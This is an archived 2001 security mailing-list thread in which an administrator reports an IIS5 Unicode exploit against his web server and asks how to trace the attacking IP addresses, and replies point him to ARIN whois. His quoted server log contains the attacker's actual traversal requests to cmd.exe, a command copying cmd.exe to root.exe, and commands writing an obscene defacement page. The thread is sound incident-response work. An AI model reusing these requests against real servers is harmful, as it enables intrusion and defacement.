If you're trying to send to the .pl script directly, you'll need to use this: http://www.arin.net/cgi-bin/whois.pl?queryinput=. After the =, place an IP (best when sent from a form). -----Original Message----- From: Matt Rowley [mailto:matt.rowleyat_private] Sent: Monday, May 14, 2001 1:26 PM To: Thomas Springer; INCIDENTSat_private Subject: RE: who's owning this ip? http://www.arin.net/cgi-bin/whois.pl to reverse lookup the ip for the coordinator. --Matt > -----Original Message----- > From: Incidents Mailing List [mailto:INCIDENTSat_private]On > Behalf Of Thomas Springer > Sent: Tuesday, May 08, 2001 12:08 PM > To: INCIDENTSat_private > Subject: who's owning this ip? > > > We had an attacker exploiting unicode on iis5 yesterday - see funny > chinese-war-pages in the log below. The hacker successfully exploited > IIS-Unicode bug, created ~100 files but was still too dumb to deface the > webserver. > > The attacker used 208.22.161.15 and 202.97.205.3. > I tried a trace but ended up with > ... > 19 210 ms 211 ms 220 ms pao1-sjc2-oc48-2.pao1.above.net [ > 20 210 ms 231 ms 230 ms 208.184.129.244.cmnetcom.com.hk [ > 21 200 ms 211 ms 220 ms 202.0.170.34 > 22 361 ms 370 ms 411 ms 202.0.170.13 > 23 370 ms 391 ms 400 ms 202.97.10.193 > 24 521 ms 541 ms 551 ms 202.97.10.66 > 25 581 ms 601 ms 581 ms 61.138.38.2 > 26 721 ms 711 ms 671 ms 61.180.139.202 > 27 341 ms 350 ms 351 ms 202.97.205.3 > > 208.22.161.15 seems to end at > 17 130 ms 130 ms 131 ms ewr-core-02.inet.qwest.net > [205.171.17.130] > 18 110 ms 110 ms 111 ms ewr-brdr-01.inet.qwest.net > [205.171.17.82] > 19 * * * Timeout.. > .... > > Any chances to find out, to whom the two ip-adresses belong? > Any tool that copies cmd.exe to root.exe? > > I liked this hack, because nothing happend and people her > suddenly develop > security-awareness. hence, even the servers i begged to secure for weeks > are patched now. > BTW it's a german website - nothing to do with an > chinese-american spy-wars. > > funny hackerworld... > > thomas > > --- IIS-Logsnip --- > 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET > /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - - > 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET > /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - - > 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET > /scripts/../../winnt/system32/cmd.exe > /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - - > 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe > /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^> > ^<br^>^<br^> > ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz > e%3D7+color% > 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce > nter%22^>^<f > ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D > %22center%22 > ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</h > tml^>>.././i > ndex.asp 502 355 423 - - - > 2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe > /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^> > ^<br^>^<br^> > ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz > e%3D7+color% > 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce > nter%22^>^<f > ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D > %22center%22 > ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</h > tml^>>.././i > ndex.htm 502 355 423 - - - > > > Thomas Springer
This archive was generated by hypermail 2b30 : Mon May 14 2001 - 16:52:05 PDT